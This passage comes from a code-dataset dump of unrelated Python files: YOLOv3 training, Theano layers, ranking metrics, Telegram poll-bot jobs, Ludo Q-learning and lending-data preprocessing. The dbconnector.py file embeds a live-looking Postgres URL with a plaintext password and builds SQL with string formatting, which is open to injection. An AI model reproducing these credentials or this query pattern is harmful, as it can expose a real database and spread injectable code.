\n if args.test:\n from ..instrument.scope.test import test_detection\n from ..instrument.gbf.test import test_detection\n activate_error_dialog()\n app = QtGui.QApplication([])\n win = get_scope_window(args.plot_engine)\n win.show()\n app.exec_()\n\n\nif __name__=='__main__':\n main()\n","sub_path":"tpmontrouge/tpmontrouge/interface/scope/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"7895555","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Apr 27 16:04:42 2018\n\n@author: ASUS\n\"\"\"\n\nimport os\nfrom urllib import parse\nimport psycopg2 as ps\nimport pandas as pd\nimport datetime\nimport random\nimport string\n\ndef connectToDatabase():\n url='postgres://nrarbplrmncopz:83c8824b40049266f138346faf865fb3dfa9055b05a6cab130cf7a295cd40198@ec2-54-83-204-6.compute-1.amazonaws.com:5432/d43d4knqc74pv2'\n\n os.environ['DATABASE_URL'] = url\n \n parse.uses_netloc.append('postgres')\n url=parse.urlparse(os.environ['DATABASE_URL'])\n \n conn=ps.connect(\n database=url.path[1:],\n user=url.username,\n password=url.password,\n host=url.hostname,\n port=url.port\n )\n \n cur=conn.cursor()\n \n return cur, conn\n\ndef runquery(query):\n cur, conn=connectToDatabase()\n result=None\n try:\n cur.execute(query)\n result=list(cur)\n except:\n result=['error']\n \n cur.close()\n conn.commit()\n return result\n\ndef idgenerator():\n result=''.join([random.choice(string.ascii_letters + string.digits) for n in range(16)])\n return result\n\ndef addWorkerLine(calltype):\n timestart=datetime.datetime.now().strftime(\"%d-%m-%Y %H:%M:%S\")\n wid=idgenerator()\n query=\"INSERT INTO worker (wid, calltype, reply, starttime) VALUES('%s', '%s', '%s', '%s')\" %(wid,calltype,\"generating\", timestart)\n result=runquery(query)\n return wid\n \ndef updateWorkerLine(wid, reply):\n endtime=datetime.datetime.now().strftime(\"%d-%m-%Y %H:%M:%S\")\n query=\"UPDATE worker SET reply='%s', endtime='%s' WHERE wid='%s'\" %(reply, endtime, wid)\n result=runquery(query)\n return result\n\ndef getAccounts():\n query=\"SELECT seller_id, acct_name FROM accts\"\n result=runquery(query)\n ret={}\n i=0\n for line in result:\n ls={\n \"seller_id\":line[0],\n \"acct_name\":line[1]\n }\n ret[str(i)]=ls\n i+=1\n \n return ret\n\ndef getAccountDetails():\n df=pd.DataFrame(columns=['acct_name', 'seller_id', 'ims_api_key', 'tms_api_key'])\n query=\"SELECT * FROM accts\"\n result=runquery(query)\n for line in result:\n ls=list(line)\n df.loc[str(len(df))]=ls\n \n return df\n\n","sub_path":"dbconnector.py","file_name":"dbconnector.py","file_ext":"py","file_size_in_byte":2254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"275809380","text":"import os\r\nimport time\r\nimport torch\r\nimport argparse\r\nimport warnings\r\nimport numpy as np\r\nfrom PIL import Image\r\nimport torch.optim as optim\r\nfrom termcolor import colored\r\nfrom pyemojify import emojify\r\nfrom tqdm import tqdm, trange\r\nfrom tensorboardX import SummaryWriter\r\nfrom torchvision import transforms, utils\r\nimport torch.optim.lr_scheduler as lr_scheduler\r\nopj = os.path.join\r\nwarnings.filterwarnings(\"ignore\")\r\n\r\nimport config\r\nfrom model import YOLOv3\r\nfrom dataset import prepare_train_dataset, prepare_val_dataset\r\nfrom utils import get_current_time, draw_detection, save_checkpoint, load_checkpoint, mAP, log\r\n\r\n\r\ndef parse_arg():\r\n parser = argparse.ArgumentParser(description='YOLO v3 training')\r\n parser.add_argument('--reso', default=416, type=int, help=\"Input image resolution\")\r\n parser.add_argument('--lr', default=1e-3, type=float, help=\"Learning rate\")\r\n parser.add_argument('--batch', default=16, type=int, help=\"Batch size\")\r\n parser.add_argument('--dataset', default='coco', choices=['tejani', 'coco'], type=str, help=\"Dataset name\")\r\n parser.add_argument('--checkpoint', default='0.0', type=str, help=\"Checkpoint name in format: `epoch.iteration`\")\r\n parser.add_argument('--gpu', default='0', type=str, help=\"GPU id\")\r\n return parser.parse_args()\r\n\r\n\r\nargs = parse_arg()\r\ncfg = config.network[args.dataset]['cfg']\r\nlog_dir = opj(config.LOG_ROOT, get_current_time())\r\nwriter = SummaryWriter(log_dir=log_dir)\r\nos.environ['CUDA_VISIBLE_DEVICES'] = args.gpu\r\n\r\n\r\ndef train(epoch, trainloader, yolo, optimizer):\r\n \"\"\"Training wrapper\r\n\r\n @Args\r\n epoch: (int) training epoch\r\n trainloader: (Dataloader) train data loader \r\n yolo: (nn.Module) YOLOv3 model\r\n optimizer: (optim) optimizer\r\n \"\"\"\r\n yolo.train()\r\n tbar = tqdm(trainloader, ncols=80)\r\n tbar.set_description('training')\r\n for batch_idx, (names, inputs, targets) in enumerate(tbar):\r\n global_step = batch_idx + epoch * len(trainloader)\r\n \r\n # SGD burn in\r\n if (epoch == 0) & (batch_idx <= 1000):\r\n lr = optimizer.param_groups[0]['lr'] * (batch_idx / 1000) ** 4\r\n for g in optimizer.param_groups:\r\n g['lr'] = lr\r\n\r\n optimizer.zero_grad()\r\n inputs = inputs.cuda()\r\n yolo(inputs, targets)\r\n log(writer, 'train_loss', yolo.loss, global_step)\r\n yolo.loss['total'].backward()\r\n optimizer.step()\r\n\r\n # save something every 1500 iterations\r\n if (global_step + 1) % 1500 == 0:\r\n save_checkpoint(opj(config.CKPT_ROOT, args.dataset), epoch, batch_idx + 1, {\r\n 'epoch': epoch,\r\n 'iteration': batch_idx + 1,\r\n 'state_dict': yolo.state_dict()\r\n })\r\n\r\n\r\ndef val(valloader, yolo):\r\n \"\"\"Validation wrapper\r\n\r\n @Args\r\n valloader: (Dataloader) validation data loader \r\n yolo: (nn.Module) YOLOv3 model\r\n \"\"\"\r\n yolo.eval()\r\n mAPs = []\r\n tbar = tqdm(valloader, ncols=80)\r\n tbar.set_description('validation')\r\n for batch_idx, (names, inputs, targets) in enumerate(tbar):\r\n inputs = inputs.cuda()\r\n start_time = time.time()\r\n detections = yolo(inputs)\r\n forward_time = time.time()\r\n loss, cache = yolo.loss(targets)\r\n mAP_batch = mAP(detections, targets, args.reso)\r\n mAPs += mAP_batch\r\n tbar.set_description(\"mAP=%.2f\" % (np.mean(mAPs) * 100))\r\n\r\n return loss['total'], np.mean(mAPs)\r\n\r\n\r\nif __name__ == '__main__':\r\n # 1. Parsing arguments\r\n print(colored(\"\\n==>\", 'blue'), emojify(\"Parsing arguments :zap:\\n\"))\r\n assert args.reso % 32 == 0, emojify(\"Resolution must be interger times of 32 :shit:\")\r\n for arg in vars(args):\r\n print(arg, ':', getattr(args, arg))\r\n print(\"log_dir :\", log_dir)\r\n\r\n # 2. Loading network\r\n # TODO: resume tensorboard\r\n print(colored(\"\\n==>\", 'blue'), emojify(\"Loading network :hourglass:\\n\"))\r\n yolo = YOLOv3(cfg, args.reso).cuda()\r\n start_epoch, start_iteration = args.checkpoint.split('.')\r\n start_epoch, start_iteration, state_dict = load_checkpoint(\r\n opj(config.CKPT_ROOT, args.dataset),\r\n int(start_epoch),\r\n int(start_iteration)\r\n )\r\n yolo.load_state_dict(state_dict)\r\n print(\"Model starts training from epoch %d iteration %d\" % (start_epoch, start_iteration))\r\n\r\n # 3. Preparing data\r\n print(colored(\"\\n==>\", 'blue'), emojify(\"Preparing data :coffee:\\n\"))\r\n train_img_datasets, train_dataloader = prepare_train_dataset(args.dataset, args.reso, args.batch)\r\n val_img_datasets, val_dataloader = prepare_val_dataset(args.dataset, args.reso, args.batch)\r\n print(\"Number of training images:\", len(train_img_datasets))\r\n print(\"Number of validation images:\", len(val_img_datasets))\r\n\r\n # 4. Training\r\n print(colored(\"\\n==>\", 'blue'), emojify(\"Training :snowflake:\\n\"))\r\n optimizer = optim.SGD(filter(lambda p: p.requires_grad, yolo.parameters()),\r\n lr=args.lr, momentum=0.9, weight_decay=5e-4, nesterov=True)\r\n for epoch in range(start_epoch, start_epoch+20):\r\n print(\"[EPOCH] %d, learning rate = %.5f\" % (epoch, optimizer.param_groups[0]['lr']))\r\n train(epoch, train_dataloader, yolo, optimizer)\r\n # with torch.no_grad():\r\n # val_loss, val_mAP = val(val_dataloader, yolo)\r\n # scheduler.step(val_mAP)\r\n # log(writer, 'val_loss', val_loss, epoch)\r\n # log(writer, 'val_mAP', val_mAP, epoch)\r\n # print(\"Validation mAP =\", val_mAP)\r\n # if val_mAP >= best_mAP:\r\n # best_mAP = val_mAP\r\n # save_checkpoint(opj(config.CKPT_ROOT, args.dataset), epoch, len(train_dataloader), {\r\n # 'epoch': epoch,\r\n # 'iteration': len(train_dataloader),\r\n # 'state_dict': yolo.state_dict()\r\n # })\r\n","sub_path":"src/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"53360267","text":"import theano.tensor as T\nimport theano\n\n\ndef affine_layer(x, w, b):\n \"\"\"\n Input:\n x: the input of the affine layer with shape(N, c1, c2...), where we compute over n minibatch size and\n the input has c1, c2... dimensions.\n w: the weight, which has shape(c1*c2*...., M), where M is the dimension of the next hidden layer\n b: the bias, which has shape(M, )\n return: the symbolic computation of affine layer\n \"\"\"\n return x.flatten(ndim=2).dot(w) + b\n\n\ndef relu_layer(x):\n \"\"\"\n :param x: the input of any shape\n :return: the symbolic computation after relu non-linear activation function.\n \"\"\"\n return (x + T.abs_(x)) / 2\n\n\ndef batch_norm_layer(x, gamma, beta, mode, full_data):\n \"\"\"\n This implementation is using the standard deviation and mean over all the training set for the test mode.\n So we will behave differently in train mode and test mode\n :param x: a tensor of input, which has shape(N, D)-> for affine layer or (N, C, H, W)-> for conv layer\n :param gamma: a tensor variable of scale parameter of shape(D, ) or (C, )\n :param beta: a tensor variable of shift parameter of shape(D, ) or (C, )\n :return: out: computation represents the normalized computation\n \"\"\"\n axes = (0,) + tuple(range(2, x.ndim))\n pattern = [\"x\" if i != 1 else 0 for i in range(0, x.ndim)]\n gamma = gamma.dimshuffle(pattern)\n beta = beta.dimshuffle(pattern)\n if mode is 'train':\n mean = T.mean(x, axis=axes).dimshuffle(pattern)\n std = T.std(x, axis=axes).dimshuffle(pattern)\n elif mode is 'test':\n mean = T.mean(x, axis=axes).dimshuffle(pattern)\n std = T.std(x, axis=axes).dimshuffle(pattern)\n else:\n raise ValueError(mode, \"is not a valid mode\")\n out = T.nnet.batch_normalization(x, gamma, beta, mean, std)\n return out\n\n\ndef bn(x, gamma, beta, mode='train'):\n \"\"\"\n A running mean and running implementation. For every training step, we update running mean for average and std based\n on this formula:\n running_mean: momentum*running_mean + (1-momentum)*sample_mean\n running_std: momentum*running_std + (1-momentum)*sample_std\n :param x: input data\n :param gamma: same as batch_norm\n :param beta: same as batch_norm\n :param mode: 'test' or 'train'\n :return: out\n \"\"\"\n\n\ndef dropout_layer(x, p, mode):\n \"\"\"\n :param x: a tensor variable of mini-batch.\n :param p: the probability of each neuron will be dropped out\n :param mode: training or testing\n :return: out: a tensor computation graph represents x after drop out\n \"\"\"\n dtype = x.dtype\n if mode is 'train':\n srng = T.shared_randomstreams.RandomStreams()\n mask = srng.binomial(size=x.shape, p=p)/p\n mask = T.cast(mask, dtype)\n out = x * mask\n elif mode is 'test':\n out = x\n else:\n raise ValueError(mode, 'is not a mode')\n return out\n\n\ndef conv_layer(x, kernel, bias, stride=None, pad=None, kernel_size=None, keep_size=True):\n \"\"\"\n\n :param x: same as x in conv2d\n :param kernel: same as filter in conv2d\n :param stride: same as subsample in conv2d\n :param keep_size: if true, then we will use stride=(1, 1) and padding=(F-1)/2 to keep dimension\n if false, we will use the information given above.\n :param pad:\n :param kernel_size:\n :return: out, computation graph represents the convolved x\n \"\"\"\n\n if keep_size:\n assert isinstance(kernel_size, int), \"kernel_size needs to be passed\"\n pad = (kernel_size-1)/2\n stride = (1, 1)\n else:\n assert isinstance(stride, tuple or list) and isinstance(pad, int), \\\n \"If keep_size is False, you must pass pad and stride parameters!\"\n out = T.nnet.conv2d(input=x, filters=kernel, subsample=stride, border_mode=pad)\n bias = bias.dimshuffle('x', 0, 'x', 'x')\n out += bias\n return out\n\n\ndef lstm_step(x, prev_hidden, prev_cell, Wx, Wh, b):\n \"\"\"\n The computation of the cell state is as follows:\n cell = forget_gate * prev_cell + (input_gate*block_input)\n hidden state = output_gate * tanh(cell)\n :param x: input data of shape(N, D), where N is the number of mini-batches, D is the dimension of input data\n :param prev_hidden: previous hidden dimension of shape(N, H), where N is the size of mini-batches,\n H is the dim of hidden dimension\n :param prev_cell: previous cell state of shape(N, H)\n :param Wx: weight theano shared variable for the lstm has shape(D, 4H)\n 4*H are composed of [:H]->forget_gate\n [H:2H]->input_gate\n [2H:3H]->output_gate\n [3H:4H]->block_input\n :param Wh: shape of (H, 4H) same as Wx\n :param b: bias theano shared variable with shape(4H)\n :return: the computation representation of a single LSTM step\n \"\"\"\n H = prev_hidden.shape[1]\n # compute the entire activation. shape(N, 4H)\n a = T.dot(x, Wx) + T.dot(prev_hidden, Wh) + b\n\n # get forget gate, input gate, output gate and block input gate\n i = T.nnet.sigmoid(a[:, :H])\n f = T.nnet.sigmoid(a[:, H:2*H])\n o = T.nnet.sigmoid(a[:, 2*H:3*H])\n g = T.tanh(a[:, 3*H:4*H])\n\n # compute next hidden state and next cell\n cell = prev_cell * f + (i*g)\n hidden = o*T.tanh(cell)\n\n return hidden, cell\n\n\ndef word_embedding(x, W):\n \"\"\"\n :param x: input tensor variable that has shape(N, V), where N is the mini-batch size,\n T represents the index of each word at that timestep t.\n :param W: Word embedding matrix, to be learnt along with other model parameters.\n It has shape(V, D), where V is the total vocab size and D is the dimension of each word vector\n :return: out: tensor variable shape of (N, T, D). out[0, 0, :] is the word vector of sample 0 at time 0\n \"\"\"\n return W[x]\n\ndef RSS(y, true_y, mask=None):\n \"\"\"\n An implementation of residual sum square loss.\n :param y: N, D\n :param true_y: N, D\n :return: loss: N, where N represents the error for each example\n \"\"\"\n if mask is None:\n mask = T.ones(y.shape)\n y *= mask\n loss = T.sqr(y-true_y)\n loss = T.sum(loss, axis=1)\n return loss\n\ndef RMSE(y, true_y):\n \"\"\"\n Root Mean Squared Error\n error = sqrt(mean((y-true_y)**2))\n :param y:\n :param true_y:\n :return:\n \"\"\"\n loss = y-true_y\n loss = T.sqr(loss)\n loss = T.mean(loss, axis=1)\n loss = T.sqrt(loss)\n return loss\n","sub_path":"layer_utilities/layer.py","file_name":"layer.py","file_ext":"py","file_size_in_byte":6536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"143040048","text":"'''\nEvaluation metrics functions.\n'''\n# import math\nimport numpy as np\nimport collections\n\n# from sklearn.metrics import roc_auc_score\n# from sklearn.metrics import roc_curve, auc\n# from sklearn.metrics import average_precision_score\nfrom sklearn.preprocessing import label_binarize\nfrom scipy.stats import rankdata\nfrom scipy import stats\n\n\ndef _retype(y_prob, y):\n if not isinstance(y, (collections.Sequence, np.ndarray)):\n y_prob = [y_prob]\n y = [y]\n y_prob = np.array(y_prob)\n y = np.array(y)\n\n return y_prob, y\n\n# def _retype_hate(y_hate):\n# if not isinstance(y_hate, (collections.Sequence, np.ndarray)):\n# y_hate = [y_hate]\n# y_hate = np.array(y_hate)\n# return y_hate\n \ndef _binarize(y, n_classes=None):\n return label_binarize(y, classes=range(n_classes))\n\n\ndef apk(actual, predicted, k=10):\n \"\"\"\n Computes the average precision at k.\n This function computes the average prescision at k between two lists of\n items.\n Parameters\n ----------\n actual : list\n A list of elements that are to be predicted (order doesn't matter)\n predicted : list\n A list of predicted elements (order does matter)\n k : int, optional\n The maximum number of predicted elements\n Returns\n -------\n score : double\n The average precision at k over the input lists\n \"\"\"\n if len(predicted) > k:\n predicted = predicted[:k]\n\n score = 0.0\n num_hits = 0.0\n\n for i, p in enumerate(predicted):\n if p in actual and p not in predicted[:i]:\n num_hits += 1.0\n score += num_hits / (i + 1.0)\n\n if not actual:\n return 0.0\n\n return score / min(len(actual), k)\n\n\ndef mapk(y_prob, y, k=10):\n \"\"\"\n Computes the mean average precision at k.\n This function computes the mean average prescision at k between two lists\n of lists of items.\n Parameters\n ----------\n actual : list\n A list of lists of elements that are to be predicted\n (order doesn't matter in the lists)\n predicted : list\n A list of lists of predicted elements\n (order matters in the lists)\n k : int, optional\n The maximum number of predicted elements\n Returns\n -------\n score : double\n The mean average precision at k over the input lists\n \"\"\"\n predicted = [np.argsort(p_)[-k:][::-1] for p_ in y_prob]\n actual = [[y_] for y_ in y]\n return np.mean([apk(a, p, k) for a, p in zip(actual, predicted)])\n\n\ndef mean_rank(y_prob, y):\n ranks = []\n n_classes = y_prob.shape[1]\n for p_, y_ in zip(y_prob, y):\n ranks += [n_classes - rankdata(p_, method='max')[y_]]\n\n return sum(ranks) / float(len(ranks))\n\n\ndef hits_k(y_prob, y, k=10):\n acc = []\n for p_, y_ in zip(y_prob, y):\n top_k = p_.argsort()[-k:][::-1]\n acc += [1. if y_ in top_k else 0.]\n return sum(acc) / len(acc)\n\ndef _apk(actual, pred,k):\n predicted = np.argsort(pred)[-k:][::-1]\n score = 0.0\n num_hits = 0.0\n for i, p in enumerate(predicted):\n if p in actual:\n num_hits += 1.0\n score += num_hits / (i + 1.0)\n return score / min(len(actual), k)\n\ndef _hits(actual, predicted, k=20):\n predicted = np.argsort(predicted)[-k:][::-1]\n aucc = 0\n for i in predicted:\n if i in actual:\n aucc+=1\n return aucc/ min(len(actual), k)\n\n\n# def roc_auc(y_prob, y):\n# y = _binarize(y, n_classes=y_prob.shape[1])\n# fpr, tpr, _ = roc_curve(y.ravel(), y_prob.ravel())\n# return auc(fpr, tpr)\n\n# def log_prob(y_prob, y):\n# scores = []\n# for p_, y_ in zip(y_prob, y):\n# assert abs(np.sum(p_) - 1) < 1e-8\n# scores += [-math.log(p_[y_]) + 1e-8]\n# print p_, y_\n\n# return sum(scores) / len(scores)\ndef _flatten_y(y_ori, y_len):\n y_flat = []\n for i in range(y_len):\n if i==y_ori:\n y_flat.append(1)\n else:\n y_flat.append(0)\n y_flat = np.array(y_flat)\n return y_flat\n\ndef portfolio(y_prob, y, y_hate=None, k_list=[10, 50, 100], test_batch=False):\n y_prob, y = _retype(y_prob, y)\n # scores = {'auc': roc_auc(y_prob, y)}\n # scores = {'mean-rank:': mean_rank(y_prob, y)}\n scores = {}\n for k in k_list:\n scores['hits@' + str(k)] = hits_k(y_prob, y, k=k)\n scores['map@' + str(k)] = mapk(y_prob, y, k=k)\n if test_batch:\n num_test, y_len = y_prob.shape\n print(num_test, y_len)\n tau_h = 0.0\n row_h = 0.0\n hit_h = 0.0\n map_h = 0.0\n tau_nh = 0.0\n row_nh = 0.0\n hit_nh = 0.0\n map_nh = 0.0\n c_h = 0\n c_nh = 0\n tau =0.0\n row = 0.0\n for i in range(num_test):\n y_flat = _flatten_y(y[i],y_len)\n tau += stats.kendalltau(y_prob[i],y_flat)[0]\n row += stats.spearmanr(y_prob[i],y_flat)[0]\n if y_hate[i]:\n tau_h += stats.kendalltau(y_prob[i],y_flat)[0]\n row_h += stats.spearmanr(y_prob[i],y_flat)[0]\n map_h += _apk(set([y[i]]),y_prob[i],k=20)\n hit_h += _hits(set([y[i]]),y_prob[i],k=20)\n c_h += 1\n else:\n tau_nh += stats.kendalltau(y_prob[i],y_flat)[0]\n row_nh += stats.spearmanr(y_prob[i],y_flat)[0]\n map_nh += _apk(set([y[i]]),y_prob[i],k=20)\n hit_nh += _hits(set([y[i]]),y_prob[i],k=20)\n c_nh += 1\n \n assert c_h+c_nh==num_test\n scores['tau']=tau/num_test\n scores['row']=row/num_test\n scores['hate_tau'] = tau_h/c_h\n scores['hate_row'] = row_h/c_h\n scores['HATE_hits@20'] = hit_h/c_h\n scores['HATE_map@20'] = map_h/c_h\n scores['non_hate_tau'] = tau_nh/c_nh\n scores['non_hate_row'] = row_nh/c_nh\n scores['NON_HATE_hits@20'] = hit_nh/c_nh\n scores['NON_HATE_map@20'] = map_nh/c_nh\n return scores","sub_path":"code/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":5977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"221519306","text":"\"\"\"Handle messages.\"\"\"\nfrom sqlalchemy import func\nfrom sqlalchemy.orm import joinedload\nfrom datetime import datetime, timedelta\nfrom telegram.error import BadRequest, Unauthorized\n\nfrom pollbot.i18n import i18n\nfrom pollbot.models import Update, Notification, Poll\nfrom pollbot.helper.session import job_session_wrapper\nfrom pollbot.helper.update import send_updates, window_size, update_poll_messages\n\n\n@job_session_wrapper()\ndef message_update_job(context, session):\n \"\"\"Update all messages if necessary.\"\"\"\n try:\n context.job.enabled = False\n now = datetime.now()\n current_time_window = now - timedelta(seconds=now.second % window_size, microseconds=now.microsecond)\n last_time_window = current_time_window - timedelta(seconds=window_size)\n one_minute_ago = current_time_window - timedelta(minutes=1)\n\n updates = session.query(Update) \\\n .filter(Update.updated.is_(False)) \\\n .filter(Update.time_window <= last_time_window) \\\n .options(joinedload(Update.poll)) \\\n .order_by(Update.time_window.desc()) \\\n .all()\n\n polls_for_refresh = []\n for update in updates:\n # It might be that there are multiple active updates\n # due to the job timeouts and multiple repetetive votes\n # or long update tasks/telegram timeouts\n previous_active_updates = session.query(Update) \\\n .filter(Update.poll == update.poll) \\\n .filter(Update.updated.is_(False)) \\\n .all()\n if len(previous_active_updates) >= 0:\n for previous_update in previous_active_updates:\n previous_update.updated = True\n polls_for_refresh.append(previous_update.poll_id)\n session.commit()\n\n # If a more recent update has alreday been updated, ignore the previous updates\n elif update.poll_id in polls_for_refresh:\n session.refresh(update)\n if update.updated:\n continue\n\n # Get the update amount of the last minute\n updates_in_last_minute = session.query(func.sum(Update.count)) \\\n .filter(Update.poll == update.poll) \\\n .filter(Update.time_window >= one_minute_ago) \\\n .one_or_none()[0]\n if updates_in_last_minute is None:\n updates_in_last_minute = 0\n\n # Smaller 100, because we need a liiiittle bit of buffer. Timings aren't allways perfect\n if updates_in_last_minute < 100:\n send_updates(session, context.bot, update.poll, show_warning=True)\n session.query(Update) \\\n .filter(Update.id == update.id) \\\n .update({\n 'count': Update.count + 1,\n 'updated': True,\n })\n\n # Let's wait a little longer\n else:\n pass\n finally:\n context.job.enabled = True\n session.close()\n\n\n@job_session_wrapper()\ndef send_notifications(context, session):\n \"\"\"Notify the users about the poll being closed soon.\"\"\"\n polls = session.query(Poll) \\\n .join(Notification.poll) \\\n .filter(Poll.next_notification <= datetime.now()) \\\n .all()\n\n for poll in polls:\n\n time_step = poll.due_date - poll.next_notification\n\n if time_step == timedelta(days=7):\n send_notifications_for_poll(session, context.bot, poll, 'notification.one_week')\n poll.next_notification = poll.due_date - timedelta(hours=6)\n\n # One day remaining reminder\n elif time_step == timedelta(days=1):\n send_notifications_for_poll(session, context.bot, poll, 'notification.one_day')\n poll.next_notification = poll.due_date - timedelta(hours=6)\n\n # Six hours remaining reminder\n elif time_step == timedelta(hours=6):\n send_notifications_for_poll(session, context.bot, poll, 'notification.six_hours')\n poll.next_notification = poll.due_date\n\n # Send the closed notification, remove all notifications and close the poll\n elif poll.due_date == poll.next_notification:\n poll.closed = True\n update_poll_messages(session, context.bot, poll)\n\n send_notifications_for_poll(session, context.bot, poll, 'notification.closed')\n for notification in poll.notifications:\n session.delete(notification)\n\n\ndef send_notifications_for_poll(session, bot, poll, message_key):\n \"\"\"Send the notifications for a single poll depending on the remaining time.\"\"\"\n locale = poll.locale\n for notification in poll.notifications:\n try:\n # Get the chat and send the notification\n tg_chat = bot.get_chat(notification.chat_id)\n tg_chat.send_message(\n i18n.t(message_key, locale=locale, name=poll.name),\n parse_mode='markdown',\n reply_to_message_id=notification.poll_message_id,\n )\n\n except BadRequest as e:\n if e.message == 'Chat not found':\n session.delete(notification)\n # Bot was removed from group\n except Unauthorized:\n session.delete(notification)\n\n\n@job_session_wrapper()\ndef delete_old_updates(context, session):\n \"\"\"Delete all unneded updates.\"\"\"\n now = datetime.now()\n time_window = now - timedelta(seconds=now.second % window_size, microseconds=now.microsecond)\n ten_minutes_ago = time_window - timedelta(minutes=10)\n\n session.query(Update) \\\n .filter(Update.time_window <= ten_minutes_ago) \\\n .delete()\n","sub_path":"pollbot/telegram/job.py","file_name":"job.py","file_ext":"py","file_size_in_byte":5729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"271213649","text":"from pyludo import LudoGame\nfrom pyludo.StandardLudoPlayers import LudoPlayerRandom, LudoPlayerFast, LudoPlayerAggressive, LudoPlayerDefensive\nimport random\nimport time\n\nimport sys\nsys.path.append('pyludo/')\nfrom Qludo import Qludo\nmyplayer = Qludo()\n\nplayers = [\n myplayer,\n LudoPlayerRandom(),\n LudoPlayerRandom(),\n LudoPlayerRandom()\n #LudoPlayerFast(),\n #LudoPlayerAggressive(),\n #LudoPlayerDefensive(),\n]\n\nmyplayer.learning_rate = 0.02\nmyplayer.discount_rate = 0.01\n\nscores = {}\nfor player in players:\n scores[player.name] = 0\n\nn = 200\nm = 1000\n\nfor j in range(m):\n scores = {}\n for player in players:\n scores[player.name] = 0\n for i in range(n):\n random.shuffle(players)\n ludoGame = LudoGame(players)\n winner = ludoGame.play_full_game()\n scores[players[winner].name] += 1\n print('Game ', i+j*n, ' done')\n #print(myplayer.Q)\n\n\n\n myplayer.save_q_stats(filename='ludoStats4.csv', games_played=((j+1)*n), wins=(float(scores['qludo'])))\n if myplayer.epsilon > 0.01:\n myplayer.epsilon -= 0.01\n if myplayer.learning_rate > 0.01:\n myplayer.learning_rate -= 0.0005\n if myplayer.discount_rate > 0.01:\n myplayer.discount_rate -= 0.0005\n\n\nmyplayer.saveQtable('Qtablefile4.csv')\n\nprint('win distribution:', scores)\n","sub_path":"pyludo/examples/ludo4.py","file_name":"ludo4.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"30740644","text":"import pandas as pd\nfrom sklearn.feature_extraction.text import CountVectorizer\n\n\ndef get_balanced_class(data):\n sample_fully_paid = lambda row: np.random.choice([True, False], p=[0.62, 0.38])\n sample_charged_off = lambda row: np.random.choice([True, False], p=[0.38, 0.62])\n\n # fully paid\n fully_paid = data[data['loan_status'] == 'Fully Paid']\n fully_paid_samples = fully_paid.apply(sample_fully_paid, axis=1)\n fully_paid = fully_paid[fully_paid_samples]\n\n # charged off\n charged_off = data[data['loan_status'] == 'Charged Off']\n charged_off_samples = charged_off.apply(sample_charged_off, axis=1)\n charged_off = charged_off[charged_off_samples]\n\n return pd.concat([fully_paid, charged_off])\n\n\ndef rate_to_float(rate):\n try:\n return float(rate[:-1])\n except:\n return 0.0\n\n\ndef crline_dates_to_ts(crline):\n yr, month = crline.split('-')\n\n if yr.isdigit():\n if len(yr) == 1:\n yr = '200' + yr\n else:\n yr = '20' + yr\n else:\n yr, month = month, yr\n if yr == '00':\n yr = '2000'\n else:\n yr = '19' + yr\n\n return pd.to_datetime(yr + '-' + month)\n\n\ndef emp_length_to_num(emp_length):\n if emp_length[0].isdigit() and emp_length[1] == ' ':\n return int(emp_length[0])\n elif emp_length[0].isdigit() and emp_length[1] == ' ':\n return 10\n else:\n return 1\n\n\nclass LendingDataMatrix(object):\n \"\"\"docstring for LendingDataMatrix\"\"\"\n def __init__(self, data):\n self.data = data\n\n def get_rates(self):\n self.data['revol_util'] = self.data['revol_util'].apply(rate_to_float)\n self.data['int_rate'] = self.data['int_rate'].apply(rate_to_float)\n\n def get_crline_year(self):\n get_year = lambda date: crline_dates_to_ts(date).year\n self.data['earliest_cr_line'] = self.data['earliest_cr_line'].apply(get_year)\n\n def get_emp_length(self):\n self.data['emp_length'] = self.data['emp_length'].apply(emp_length_to_num)\n\n def get_text_string(self):\n get_desc = lambda desc: desc if desc == desc else ''\n self.data['desc'] = self.data['desc'].apply(get_desc)\n\n text_cols = ['title', 'emp_title', 'desc']\n concat_strings = lambda row: ' '.join([str(row[col]) for col in text_cols])\n self.data['text_string'] = self.data.apply(concat_strings, axis=1)\n self.data = self.data.drop(text_cols, axis=1)\n\n def text_to_vec(self, vectorizer=None):\n if vectorizer:\n self.vec_desc = vectorizer\n self.data_text_vec = self.vec_desc.transform(self.data['text_string'])\n else:\n max_df = 0.90\n min_df = 0.05\n self.vec_desc = CountVectorizer(ngram_range=(1, 2), max_df=max_df,\n min_df=min_df, stop_words='english',\n decode_error='ignore')\n self.data_text_vec = self.vec_desc.fit_transform(self.data['text_string'])\n\n self.data_text_vec = pd.DataFrame(self.data_text_vec.todense(), columns=self.vec_desc.vocabulary_)\n self.data_text_vec = self.data_text_vec.reset_index(drop=True)\n\n def get_issued_dates(self):\n self.data['issue_d_month'] = self.data.issue_d.apply(lambda date: date.month)\n self.data['issue_d_year'] = self.data.issue_d.apply(lambda date: date.year)\n self.data = self.data.drop('issue_d', axis=1)\n self.data['term'] = self.data['term'].apply(lambda term: term.days)\n\n def transform_bankruptcies(self):\n self.data['pub_rec_bankruptcies'] = self.data['pub_rec_bankruptcies'].apply(lambda val: 0 if val != val else val)\n self.data['pub_rec_bankruptcies'] = self.data['pub_rec_bankruptcies'].astype('object')\n\n def get_dummies(self):\n self.transform_bankruptcies()\n train_data_objects = self.data.select_dtypes(include=['object']).columns\n train_data_cats = [col for col in train_data_objects if col not in ['text_string', 'loan_status']]\n self.data_dummies = pd.get_dummies(self.data.loc[:, train_data_cats])\n self.data_dummies = self.data_dummies.reset_index(drop=True)\n\n def get_numeric(self):\n self.data_numeric = self.data.select_dtypes(exclude=['object'])\n self.data_numeric = 